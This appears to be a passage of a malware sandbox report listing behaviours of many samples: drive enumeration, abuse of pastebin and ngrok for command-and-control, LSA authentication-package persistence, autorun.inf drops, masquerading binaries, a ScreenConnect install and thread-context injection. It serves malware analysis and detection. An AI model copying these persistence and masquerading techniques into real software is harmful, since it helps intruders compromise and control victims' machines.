| File opened (read-only) | \??\J: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\Z: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\G: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\I: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\J: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\V: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\E: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\E: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\H: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\L: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\Y: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\Z: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\O: | C:\Windows\SysWOW64\msiexec.exe | N/A |
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| N/A | pastebin.com | N/A | N/A |
| N/A | pastebin.com | N/A | N/A |
| N/A | pastebin.com | N/A | N/A |
| N/A | pastebin.com | N/A | N/A |
| N/A | pastebin.com | N/A | N/A |
| N/A | pastebin.com | N/A | N/A |
| N/A | 0.tcp.eu.ngrok.io | N/A | N/A |
| N/A | pastebin.com | N/A | N/A |
| N/A | pastebin.com | N/A | N/A |
| N/A | pastebin.com | N/A | N/A |
| N/A | pastebin.com | N/A | N/A |
| N/A | pastebin.com | N/A | N/A |
| N/A | pastebin.com | N/A | N/A |
| N/A | pastebin.com | N/A | N/A |
| N/A | pastebin.com | N/A | N/A |
| N/A | pastebin.com | N/A | N/A |
| N/A | pastebin.com | N/A | N/A |
| N/A | pastebin.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | pastebin.com | N/A | N/A |
| N/A | pastebin.com | N/A | N/A |
| N/A | pastebin.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | 0.tcp.eu.ngrok.io | N/A | N/A |
| N/A | pastebin.com | N/A | N/A |
| N/A | pastebin.com | N/A | N/A |
| N/A | pastebin.com | N/A | N/A |
| N/A | pastebin.com | N/A | N/A |
| N/A | 0.tcp.in.ngrok.io | N/A | N/A |
| N/A | pastebin.com | N/A | N/A |
| N/A | pastebin.com | N/A | N/A |
| N/A | pastebin.com | N/A | N/A |
| N/A | pastebin.com | N/A | N/A |
| N/A | 0.tcp.eu.ngrok.io | N/A | N/A |
| N/A | pastebin.com | N/A | N/A |
| N/A | 2.tcp.eu.ngrok.io | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | pastebin.com | N/A | N/A |
| N/A | pastebin.com | N/A | N/A |
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | ip-api.com | N/A | N/A |
| N/A | ip-api.com | N/A | N/A |
Boot or Logon Autostart Execution: Authentication Package
| Description | Indicator | Process | Target |
| Set value (data) | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\Authentication Packages = 6d007300760031005f003000000043003a005c00500072006f006700720061006d002000460069006c00650073002000280078003800360029005c00530063007200650065006e0043006f006e006e00650063007400200043006c00690065006e00740020002800300063006500660037006400310030006400380066003400350039006600630029005c00530063007200650065006e0043006f006e006e006500630074002e00570069006e0064006f0077007300410075007400680065006e007400690063006100740069006f006e005000610063006b006100670065002e0064006c006c0000000000 | C:\Windows\system32\msiexec.exe | N/A |
Drops autorun.inf file
| Description | Indicator | Process | Target |
| File created | C:\autorun.inf | C:\Users\Admin\AppData\Roaming\server.exe | N/A |
| File opened for modification | C:\autorun.inf | C:\Users\Admin\AppData\Roaming\server.exe | N/A |
| File created | F:\autorun.inf | C:\Users\Admin\AppData\Roaming\server.exe | N/A |
| File opened for modification | F:\autorun.inf | C:\Users\Admin\AppData\Roaming\server.exe | N/A |
Drops file in System32 directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\system32\dll32 | C:\Windows\system32\dll32\msinfo32.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\Explower.exe | C:\Users\Admin\AppData\Local\Temp\server.exe | N/A |
| File opened for modification | C:\Windows\system32\Windows Shell Interactive.exe | C:\Windows\system32\Windows Shell Interactive.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\Explower.exe | C:\Users\Admin\AppData\Local\Temp\server.exe | N/A |
| File created | C:\Windows\SysWOW64\Explower.exe | C:\Users\Admin\AppData\Local\Temp\server.exe | N/A |
| File opened for modification | C:\Windows\system32\dll32\msinfo32.exe | C:\Windows\system32\dll32\msinfo32.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\Explower.exe | C:\Users\Admin\AppData\Local\Temp\server.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\Explower.exe | C:\Users\Admin\AppData\Local\Temp\server.exe | N/A |
| File opened for modification | C:\Windows\system32\Windows Shell Interactive.exe | C:\Windows\system32\Windows Shell Interactive.exe | N/A |
| File opened for modification | C:\Windows\system32\dll32\msinfo32.exe | C:\Windows\system32\dll32\msinfo32.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\Explower.exe | C:\Users\Admin\AppData\Local\Temp\server.exe | N/A |
| File opened for modification | C:\Windows\system32\dll32 | C:\Windows\system32\dll32\msinfo32.exe | N/A |
| File opened for modification | C:\Windows\system32\dll32\msinfo32.exe | C:\Windows\system32\dll32\msinfo32.exe | N/A |
| File opened for modification | C:\Windows\system32\dll32 | C:\Windows\system32\dll32\msinfo32.exe | N/A |
| File opened for modification | C:\Windows\system32\dll32 | C:\Windows\system32\dll32\msinfo32.exe | N/A |
| File opened for modification | C:\Windows\system32\dll32 | C:\Windows\system32\dll32\msinfo32.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\Explower.exe | C:\Users\Admin\AppData\Local\Temp\server.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\Explower.exe | C:\Users\Admin\AppData\Local\Temp\server.exe | N/A |
| File opened for modification | C:\Windows\system32\Windows Shell Interactive.exe | C:\Windows\system32\Windows Shell Interactive.exe | N/A |
| File opened for modification | C:\Windows\system32\dll32\msinfo32.exe | C:\Windows\system32\dll32\msinfo32.exe | N/A |
| File opened for modification | C:\Windows\system32\Windows Shell Interactive.exe | C:\Windows\system32\Windows Shell Interactive.exe | N/A |
| File opened for modification | C:\Windows\system32\dll32\msinfo32.exe | C:\Windows\system32\dll32\msinfo32.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\Explower.exe | C:\Users\Admin\AppData\Local\Temp\server.exe | N/A |
| File opened for modification | C:\Windows\system32\Windows Shell Interactive.exe | C:\Users\Admin\AppData\Local\Temp\a\Client.exe | N/A |
| File opened for modification | C:\Windows\system32\dll32 | C:\Windows\system32\dll32\msinfo32.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\Explower.exe | C:\Users\Admin\AppData\Local\Temp\server.exe | N/A |
| File opened for modification | C:\Windows\system32\Windows Shell Interactive.exe | C:\Windows\system32\Windows Shell Interactive.exe | N/A |
| File created | C:\Windows\system32\Windows Shell Interactive.exe | C:\Users\Admin\AppData\Local\Temp\a\Client.exe | N/A |
| File opened for modification | C:\Windows\system32\dll32 | C:\Windows\system32\dll32\msinfo32.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\Explower.exe | C:\Users\Admin\AppData\Local\Temp\server.exe | N/A |
| File opened for modification | C:\Windows\system32\dll32\msinfo32.exe | C:\Windows\system32\dll32\msinfo32.exe | N/A |
| File opened for modification | C:\Windows\system32\dll32\msinfo32.exe | C:\Windows\system32\dll32\msinfo32.exe | N/A |
| File created | C:\Windows\system32\dll32\msinfo32.exe | C:\Users\Admin\AppData\Local\Temp\a\discordupdate.exe | N/A |
| File opened for modification | C:\Windows\system32\dll32\msinfo32.exe | C:\Windows\system32\dll32\msinfo32.exe | N/A |
| File created | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\ScreenConnect Client (0cef7d10d8f459fc)\bzdjfdvz.newcfg | C:\Program Files (x86)\ScreenConnect Client (0cef7d10d8f459fc)\ScreenConnect.ClientService.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\Explower.exe | C:\Users\Admin\AppData\Local\Temp\server.exe | N/A |
| File opened for modification | C:\Windows\system32\Windows Shell Interactive.exe | C:\Windows\system32\Windows Shell Interactive.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\Explower.exe | C:\Users\Admin\AppData\Local\Temp\server.exe | N/A |
| File opened for modification | C:\Windows\system32\dll32\msinfo32.exe | C:\Users\Admin\AppData\Local\Temp\a\discordupdate.exe | N/A |
| File created | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\ScreenConnect Client (0cef7d10d8f459fc)\bzdjfdvz.tmp | C:\Program Files (x86)\ScreenConnect Client (0cef7d10d8f459fc)\ScreenConnect.ClientService.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\Explower.exe | C:\Users\Admin\AppData\Local\Temp\server.exe | N/A |
| File opened for modification | C:\Windows\system32\dll32 | C:\Windows\system32\dll32\msinfo32.exe | N/A |
| File opened for modification | C:\Windows\system32\dll32 | C:\Users\Admin\AppData\Local\Temp\a\discordupdate.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\Explower.exe | C:\Users\Admin\AppData\Local\Temp\server.exe | N/A |
| File opened for modification | C:\Windows\system32\dll32\msinfo32.exe | C:\Windows\system32\dll32\msinfo32.exe | N/A |
| File opened for modification | C:\Windows\system32\Windows Shell Interactive.exe | C:\Windows\system32\Windows Shell Interactive.exe | N/A |
| File opened for modification | C:\Windows\system32\Windows Shell Interactive.exe | C:\Windows\system32\Windows Shell Interactive.exe | N/A |
| File opened for modification | C:\Windows\system32\dll32 | C:\Windows\system32\dll32\msinfo32.exe | N/A |
Enumerates processes with tasklist
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\tasklist.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\tasklist.exe | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 4020 set thread context of 1532 | N/A | C:\ProgramData\Bitdefender\$77-Bitdefender.exe | \??\c:\program files (x86)\internet explorer\iexplore.exe |
| PID 1532 set thread context of 4144 | N/A | \??\c:\program files (x86)\internet explorer\iexplore.exe | C:\Windows\SysWOW64\svchost.exe |
| PID 3472 set thread context of 3576 | N/A | C:\Users\Admin\AppData\Local\Temp\a\rea.exe | \??\c:\program files (x86)\internet explorer\iexplore.exe |
Drops file in Program Files directory
| Description | Indicator | Process | Target |
| File created | C:\Program Files (x86)\SCSI Host\scsihost.exe | C:\Users\Admin\AppData\Local\Temp\a\jij.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Explower.exe | C:\Users\Admin\AppData\Local\Temp\server.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Explower.exe | C:\Users\Admin\AppData\Local\Temp\server.exe | N/A |
| File created | C:\Program Files (x86)\SCSI Host\scsihost.exe | C:\Users\Admin\AppData\Local\Temp\a\MSystem32.exe | N/A |
| File created | C:\Program Files (x86)\ScreenConnect Client (0cef7d10d8f459fc)\ScreenConnect.Core.dll | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files (x86)\ScreenConnect Client (0cef7d10d8f459fc)\ScreenConnect.WindowsBackstageShell.exe | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files (x86)\ScreenConnect Client (0cef7d10d8f459fc)\ScreenConnect.WindowsCredentialProvider.dll | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files (x86)\ScreenConnect Client (0cef7d10d8f459fc)\ScreenConnect.WindowsFileManager.exe | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Explower.exe | C:\Users\Admin\AppData\Local\Temp\server.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Explower.exe | C:\Users\Admin\AppData\Local\Temp\server.exe | N/A |
| File opened for modification | C:\Program Files (x86)\SCSI Host\scsihost.exe | C:\Users\Admin\AppData\Local\Temp\a\MSystem32.exe | N/A |
| File created | C:\Program Files (x86)\ScreenConnect Client (0cef7d10d8f459fc)\Client.Override.resources | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files (x86)\ScreenConnect Client (0cef7d10d8f459fc)\Client.resources | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Explower.exe | C:\Users\Admin\AppData\Local\Temp\server.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Explower.exe | C:\Users\Admin\AppData\Local\Temp\server.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Explower.exe | C:\Users\Admin\AppData\Local\Temp\server.exe | N/A |
| File created | C:\Program Files (x86)\ScreenConnect Client (0cef7d10d8f459fc)\ScreenConnect.WindowsClient.exe | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files (x86)\ScreenConnect Client (0cef7d10d8f459fc)\ScreenConnect.WindowsClient.exe.config | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files (x86)\ScreenConnect Client (0cef7d10d8f459fc)\ScreenConnect.ClientService.exe | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files (x86)\ScreenConnect Client (0cef7d10d8f459fc)\app.config | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files (x86)\ScreenConnect Client (0cef7d10d8f459fc)\Client.Override.en-US.resources | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Program Files (x86)\SCSI Host\scsihost.exe | C:\Users\Admin\AppData\Local\Temp\a\jij.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Explower.exe | C:\Users\Admin\AppData\Local\Temp\server.exe | N/A |
| File created | C:\Program Files (x86)\ScreenConnect Client (0cef7d10d8f459fc)\ScreenConnect.WindowsFileManager.exe.config | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files (x86)\ScreenConnect Client (0cef7d10d8f459fc)\Client.en-US.resources | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files (x86)\ScreenConnect Client (0cef7d10d8f459fc)\system.config | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files (x86)\Explower.exe | C:\Users\Admin\AppData\Local\Temp\server.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Explower.exe | C:\Users\Admin\AppData\Local\Temp\server.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Explower.exe | C:\Users\Admin\AppData\Local\Temp\server.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Explower.exe | C:\Users\Admin\AppData\Local\Temp\server.exe | N/A |
| File created | C:\Program Files (x86)\ScreenConnect Client (0cef7d10d8f459fc)\ScreenConnect.WindowsAuthenticationPackage.dll | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Explower.exe | C:\Users\Admin\AppData\Local\Temp\server.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Explower.exe | C:\Users\Admin\AppData\Local\Temp\server.exe | N/A |
| File created | C:\Program Files (x86)\ScreenConnect Client (0cef7d10d8f459fc)\ScreenConnect.Client.dll | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files (x86)\ScreenConnect Client (0cef7d10d8f459fc)\ScreenConnect.ClientService.dll | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files (x86)\ScreenConnect Client (0cef7d10d8f459fc)\ScreenConnect.Windows.dll | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files (x86)\ScreenConnect Client (0cef7d10d8f459fc)\ScreenConnect.WindowsBackstageShell.exe.config | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Explower.exe | C:\Users\Admin\AppData\Local\Temp\server.exe | N/A |
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File created | C:\Windows\Installer\f7703e7.msi | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Installer\MSI148D.tmp | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Installer\{85F34968-1C69-C400-0998-25E265AEE9E4}\DefaultIcon | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\INF\setupapi.dev.log | C:\Windows\system32\DrvInst.exe | N/A |
| File opened for modification | C:\Windows\INF\setupapi.ev3 | C:\Windows\system32\DrvInst.exe | N/A |
| File opened for modification | C:\Windows\INF\setupapi.ev1 | C:\Windows\system32\DrvInst.exe | N/A |
| File opened for modification | C:\Windows\Installer\f7703e7.msi | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Installer\MSIED1.tmp | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Windows\Installer\f7703ea.msi | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\ViBases | C:\Users\Admin\AppData\Local\Temp\a\1.exe | N/A |
| File created | C:\Windows\Installer\f7703e8.ipi | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Installer\ | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Windows\Installer\{85F34968-1C69-C400-0998-25E265AEE9E4}\DefaultIcon | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Installer\f7703e8.ipi | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\ImmediatelyBros | C:\Users\Admin\AppData\Local\Temp\a\1.exe | N/A |
| File opened for modification | C:\Windows\OxfordPrintable | C:\Users\Admin\AppData\Local\Temp\a\1.exe | N/A |
| File opened for modification | C:\Windows\TransferRare | C:\Users\Admin\AppData\Local\Temp\a\1.exe | N/A |
| File opened for modification | C:\Windows\EscortsNascar | C:\Users\Admin\AppData\Local\Temp\a\1.exe | N/A |
| File opened for modification | C:\Windows\NavyPromising | C:\Users\Admin\AppData\Local\Temp\a\1.exe | N/A |
| File opened for modification | C:\Windows\Installer\MSIB76.tmp | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Windows\Installer\wix{85F34968-1C69-C400-0998-25E265AEE9E4}.SchedServiceConfig.rmi | C:\Windows\syswow64\MsiExec.exe | N/A |
| File opened for modification | C:\Windows\HonoluluSyndrome | C:\Users\Admin\AppData\Local\Temp\a\1.exe | N/A |
Enumerates physical storage devices
Event Triggered Execution: Netsh Helper DLL
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key value enumerated | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key value enumerated | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key value enumerated | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key value enumerated | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key value enumerated | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key value enumerated | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key value enumerated | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key value enumerated | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key value enumerated | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key value enumerated | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key value enumerated | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key value enumerated | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key value enumerated | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key value enumerated | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key value enumerated | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
Program crash
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Roaming\Microsoft\svchost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\server.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\ProgramData\Synaptics\Synaptics.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\a\ApiUpdater.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\a\MSystem32.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\schtasks.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\634977\Surrey.com | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\a\Enalib.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\svchost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\a\Pdf%20Reader.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\a\1.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\a\zoom_invitecode=23884232.zoom.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WScript.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\a\noyjhoadw.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\a\36.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Roaming\Windows Defender\comctl32.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\a\windows.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\a\99999.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\a\Wallet-PrivateKey.Pdf.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\syswow64\MsiExec.exe | N/A |
